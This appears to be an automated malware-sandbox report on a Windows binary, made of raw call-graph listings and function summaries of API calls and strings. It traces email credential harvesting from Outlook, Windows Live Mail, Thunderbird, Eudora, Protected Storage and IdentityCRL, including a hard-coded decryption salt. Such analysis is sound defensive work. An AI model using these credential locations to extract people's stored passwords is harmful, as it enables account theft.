RegEnumKeyExA 33785->33946 33788->33777 33789->33671 33790->33675 33791->33679 33793 410816 33792->33793 33794 4107f1 FreeLibrary 33793->33794 33795 403ddd 
33794->33795 33795->33684 33947 410a9c RegOpenKeyExA 33796->33947 33798 402ff9 33799 403006 memset 33798->33799 33800 40312c 33798->33800 33948 410b62 RegEnumKeyExA 33799->33948 33800->33688 33802 403122 RegCloseKey 33802->33800 33803 410b1e 3 API calls 33804 403058 memset sprintf 33803->33804 33949 410a9c RegOpenKeyExA 33804->33949 33806 403033 33806->33802 33806->33803 33807 4030a2 memset 33806->33807 33808 410b62 RegEnumKeyExA 33806->33808 33810 4030f9 RegCloseKey 33806->33810 33951 402db3 26 API calls 33806->33951 33950 410b62 RegEnumKeyExA 33807->33950 33808->33806 33810->33806 33813 4032d5 33812->33813 33814 4033a9 33812->33814 33952 4021b6 memset 33813->33952 33827 4034e4 memset memset 33814->33827 33816 4032e1 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33816->33953 33818 4032ea 33819 4032f8 memset GetPrivateProfileSectionA 33818->33819 33954 4023e5 16 API calls 33818->33954 33819->33814 33824 40332f 33819->33824 33821 40339b strlen 33821->33814 33821->33824 33823 403350 strchr 33823->33824 33824->33814 33824->33821 33955 4021b6 memset 33824->33955 33956 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33824->33956 33957 4023e5 16 API calls 33824->33957 33828 410b1e 3 API calls 33827->33828 33829 40353f 33828->33829 33830 40357f 33829->33830 33831 403546 _mbscpy 33829->33831 33835 403985 33830->33835 33958 406d55 strlen _mbscat 33831->33958 33833 403565 _mbscat 33959 4033f0 19 API calls 33833->33959 33960 40466b _mbscpy 33835->33960 33839 4039aa 33840 4039ff 33839->33840 33961 40f460 memset memset 33839->33961 33982 40f6e2 33839->33982 33998 4038e8 21 API calls 33839->33998 33842 404785 FreeLibrary 33840->33842 33843 403a0b 33842->33843 33844 4037ca memset memset 33843->33844 34006 444551 memset 33844->34006 33847 4038e2 33847->33698 33910 40f334 334 API calls 33847->33910 33849 40382e 33850 406f06 2 API calls 33849->33850 33851 403843 33850->33851 33852 406f06 2 API calls 33851->33852 33853 403855 strchr 33852->33853 33854 
403884 _mbscpy 33853->33854 33855 403897 strlen 33853->33855 33856 4038bf _mbscpy 33854->33856 33855->33856 33857 4038a4 sprintf 33855->33857 34018 4023e5 16 API calls 33856->34018 33857->33856 33860 44b090 33859->33860 33861 40fb10 RegOpenKeyExA 33860->33861 33862 403e7f 33861->33862 33863 40fb3b RegOpenKeyExA 33861->33863 33873 40f96c 33862->33873 33864 40fb55 RegQueryValueExA 33863->33864 33865 40fc2d RegCloseKey 33863->33865 33866 40fc23 RegCloseKey 33864->33866 33867 40fb84 33864->33867 33865->33862 33866->33865 33868 404734 3 API calls 33867->33868 33869 40fb91 33868->33869 33869->33866 33870 40fc19 LocalFree 33869->33870 33871 40fbdd memcpy memcpy 33869->33871 33870->33866 34023 40f802 11 API calls 33871->34023 33874 4070ae GetVersionExA 33873->33874 33875 40f98d 33874->33875 33876 4045db 7 API calls 33875->33876 33884 40f9a9 33876->33884 33877 40fae6 33878 404656 FreeLibrary 33877->33878 33879 403e85 33878->33879 33885 4442ea memset 33879->33885 33880 40fa13 memset WideCharToMultiByte 33881 40fa43 _strnicmp 33880->33881 33880->33884 33882 40fa5b WideCharToMultiByte 33881->33882 33881->33884 33883 40fa88 WideCharToMultiByte 33882->33883 33882->33884 33883->33884 33884->33877 33884->33880 33886 410dbb 9 API calls 33885->33886 33887 444329 33886->33887 34024 40759e strlen strlen 33887->34024 33892 410dbb 9 API calls 33893 444350 33892->33893 33894 40759e 3 API calls 33893->33894 33895 44435a 33894->33895 33896 444212 65 API calls 33895->33896 33897 444366 memset memset 33896->33897 33898 410b1e 3 API calls 33897->33898 33899 4443b9 ExpandEnvironmentStringsA strlen 33898->33899 33900 4443f4 _strcmpi 33899->33900 33901 4443e5 33899->33901 33902 403e91 33900->33902 33903 44440c 33900->33903 33901->33900 33902->33478 33904 444212 65 API calls 33903->33904 33904->33902 33905->33660 33906->33664 33907->33672 33908->33676 33909->33680 33910->33698 33911->33700 33912->33713 33913->33718 33914->33714 33916 40841c 33915->33916 33917 410a9c RegOpenKeyExA 33916->33917 
33917->33727 33918->33731 33919->33731 33920->33737 33921->33739 33922->33731 33923->33742 33924->33748 33925->33748 33926->33751 33927->33748 33929 404656 FreeLibrary 33928->33929 33930 4045e3 LoadLibraryA 33929->33930 33931 404651 33930->33931 33932 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33930->33932 33931->33756 33931->33759 33931->33760 33933 40463d 33932->33933 33934 404643 33933->33934 33935 404656 FreeLibrary 33933->33935 33934->33931 33935->33931 33937 403cd2 33936->33937 33938 40465c FreeLibrary 33936->33938 33937->33769 33938->33937 33939->33766 33940->33773 33941->33785 33942->33781 33943->33782 33944->33785 33945->33785 33946->33785 33947->33798 33948->33806 33949->33806 33950->33806 33951->33806 33952->33816 33953->33818 33954->33819 33955->33823 33956->33824 33957->33824 33958->33833 33959->33830 33960->33839 33999 4078ba 33961->33999 33964 4078ba _mbsnbcat 33965 40f5a3 RegOpenKeyExA 33964->33965 33966 40f5c3 RegQueryValueExA 33965->33966 33967 40f6d9 33965->33967 33968 40f6d0 RegCloseKey 33966->33968 33969 40f5f0 33966->33969 33967->33839 33968->33967 33969->33968 33970 40f675 33969->33970 34003 40466b _mbscpy 33969->34003 33970->33968 34004 4012ee strlen 33970->34004 33972 40f611 33974 404734 3 API calls 33972->33974 33979 40f616 33974->33979 33975 40f69e RegQueryValueExA 33975->33968 33976 40f6c1 33975->33976 33976->33968 33977 40f66a 33978 404785 FreeLibrary 33977->33978 33978->33970 33979->33977 33980 40f661 LocalFree 33979->33980 33981 40f645 memcpy 33979->33981 33980->33977 33981->33980 34005 40466b _mbscpy 33982->34005 33984 40f6fa 33985 4045db 7 API calls 33984->33985 33986 40f708 33985->33986 33987 40f7e2 33986->33987 33988 404734 3 API calls 33986->33988 33989 404656 FreeLibrary 33987->33989 33993 40f715 33988->33993 33990 40f7f1 33989->33990 33991 404785 FreeLibrary 33990->33991 33992 40f7fc 33991->33992 33992->33839 33993->33987 33994 40f797 WideCharToMultiByte 33993->33994 33995 40f7b8 strlen 
33994->33995 33996 40f7d9 LocalFree 33994->33996 33995->33996 33997 40f7c8 _mbscpy 33995->33997 33996->33987 33997->33996 33998->33839 34000 4078e6 33999->34000 34001 4078c7 _mbsnbcat 34000->34001 34002 4078ea 34000->34002 34001->34000 34002->33964 34003->33972 34004->33975 34005->33984 34019 410a9c RegOpenKeyExA 34006->34019 34008 44458b 34009 40381a 34008->34009 34020 410add RegQueryValueExA 34008->34020 34009->33847 34017 4021b6 memset 34009->34017 34011 4445dc RegCloseKey 34011->34009 34012 4445a4 34012->34011 34021 410add RegQueryValueExA 34012->34021 34014 4445c1 34014->34011 34022 444879 30 API calls 34014->34022 34016 4445da 34016->34011 34017->33849 34018->33847 34019->34008 34020->34012 34021->34014 34022->34016 34023->33870 34025 4075c9 34024->34025 34026 4075bb _mbscat 34024->34026 34027 444212 34025->34027 34026->34025 34044 407e9d 34027->34044 34030 44424d 34031 444274 34030->34031 34032 444258 34030->34032 34052 407ef8 34030->34052 34033 407e9d 9 API calls 34031->34033 34065 444196 52 API calls 34032->34065 34040 4442a0 34033->34040 34035 407ef8 9 API calls 34035->34040 34036 4442ce 34062 407f90 34036->34062 34040->34035 34040->34036 34042 444212 65 API calls 34040->34042 34066 407e62 strcmp strcmp 34040->34066 34041 407f90 FindClose 34043 4442e4 34041->34043 34042->34040 34043->33892 34045 407f90 FindClose 34044->34045 34046 407eaa 34045->34046 34047 406f06 2 API calls 34046->34047 34048 407ebd strlen strlen 34047->34048 34049 407ee1 34048->34049 34050 407eea 34048->34050 34067 4070e3 strlen _mbscat _mbscpy _mbscat 34049->34067 34050->34030 34053 407f03 FindFirstFileA 34052->34053 34054 407f24 FindNextFileA 34052->34054 34055 407f3f 34053->34055 34056 407f46 strlen strlen 34054->34056 34057 407f3a 34054->34057 34055->34056 34059 407f7f 34055->34059 34056->34059 34060 407f76 34056->34060 34058 407f90 FindClose 34057->34058 34058->34055 34059->34030 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34060->34068 34063 407fa3 34062->34063 34064 407f99 
FindClose 34062->34064 34063->34041 34064->34063 34065->34030 34066->34040 34067->34050 34068->34059 34069->33492 34070->33496 34071->33503 34072->33502 34073->33509 34074->33506 34075->33501 34420 43ffc8 18 API calls 34234 4281cc 15 API calls 34422 4383cc 110 API calls 34235 4275d3 41 API calls 34423 4153d3 22 API calls 34236 444dd7 _XcptFilter 34428 4013de 15 API calls 34430 425115 111 API calls 34431 43f7db 18 API calls 34434 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34238 4335ee 16 API calls 34436 429fef 11 API calls 34239 444deb _exit _c_exit 34437 40bbf0 138 API calls 34242 425115 79 API calls 34441 437ffa 22 API calls 34246 4021ff 14 API calls 34247 43f5fc 149 API calls 34442 40e381 9 API calls 34249 405983 40 API calls 34250 42b186 27 API calls 34251 427d86 76 API calls 34252 403585 20 API calls 34254 42e58e 18 API calls 34257 425115 75 API calls 34259 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34446 434395 16 API calls 34261 441d9c memcmp 34448 43f79b 119 API calls 34262 40c599 43 API calls 34449 426741 87 API calls 34266 4401a6 21 API calls 34268 426da6 memcpy memset memset memcpy 34269 4335a5 15 API calls 34271 4299ab memset memset memcpy memset memset 34272 40b1ab 8 API calls 34454 425115 76 API calls 34458 4113b2 18 API calls 34462 40a3b8 memset sprintf SendMessageA 34076 410bbc 34079 4109cf 34076->34079 34080 4109dc 34079->34080 34081 410a23 memset GetPrivateProfileStringA 34080->34081 34082 4109ea memset 34080->34082 34087 407646 strlen 34081->34087 34092 4075cd sprintf memcpy 34082->34092 34085 410a0c WritePrivateProfileStringA 34086 410a65 34085->34086 34088 40765a 34087->34088 34089 40765c 34087->34089 34088->34086 34091 4076a3 34089->34091 34093 40737c strtoul 34089->34093 34091->34086 34092->34085 34093->34089 
34274 40b5bf memset memset _mbsicmp

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040832F
                                                                                                                  • memset.MSVCRT ref: 00408343
                                                                                                                  • memset.MSVCRT ref: 0040835F
                                                                                                                  • memset.MSVCRT ref: 00408376
                                                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                  • strlen.MSVCRT ref: 004083E9
                                                                                                                  • strlen.MSVCRT ref: 004083F8
                                                                                                                  • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                  • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                  • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                  • strlen.MSVCRT ref: 00407F5C
                                                                                                                  • strlen.MSVCRT ref: 00407F64
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                  • String ID: ACD
                                                                                                                  • API String ID: 379999529-620537770
                                                                                                                  • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                  • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00401E8B
                                                                                                                  • strlen.MSVCRT ref: 00401EA4
                                                                                                                  • strlen.MSVCRT ref: 00401EB2
                                                                                                                  • strlen.MSVCRT ref: 00401EF8
                                                                                                                  • strlen.MSVCRT ref: 00401F06
                                                                                                                  • memset.MSVCRT ref: 00401FB1
                                                                                                                  • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                  • memset.MSVCRT ref: 00402003
                                                                                                                  • sprintf.MSVCRT ref: 00402030
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • memset.MSVCRT ref: 00402086
                                                                                                                  • memset.MSVCRT ref: 0040209B
                                                                                                                  • strlen.MSVCRT ref: 004020A1
                                                                                                                  • strlen.MSVCRT ref: 004020AF
                                                                                                                  • strlen.MSVCRT ref: 004020E2
                                                                                                                  • strlen.MSVCRT ref: 004020F0
                                                                                                                  • memset.MSVCRT ref: 00402018
                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76270A60,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404AB8
                                                                                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404ADE
                                                                                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                  Strings
                                                                                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                  • pstorec.dll, xrefs: 00403C30
                                                                                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                  • String ID: h4ND

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044430B
                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                  • memset.MSVCRT ref: 00444379
                                                                                                                  • memset.MSVCRT ref: 00444394
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                  • strlen.MSVCRT ref: 004443DB
                                                                                                                  • _strcmpi.MSVCRT ref: 00444401
                                                                                                                  Strings
                                                                                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                  • Store Root, xrefs: 004443A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F567
                                                                                                                  • memset.MSVCRT ref: 0040F57F
                                                                                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
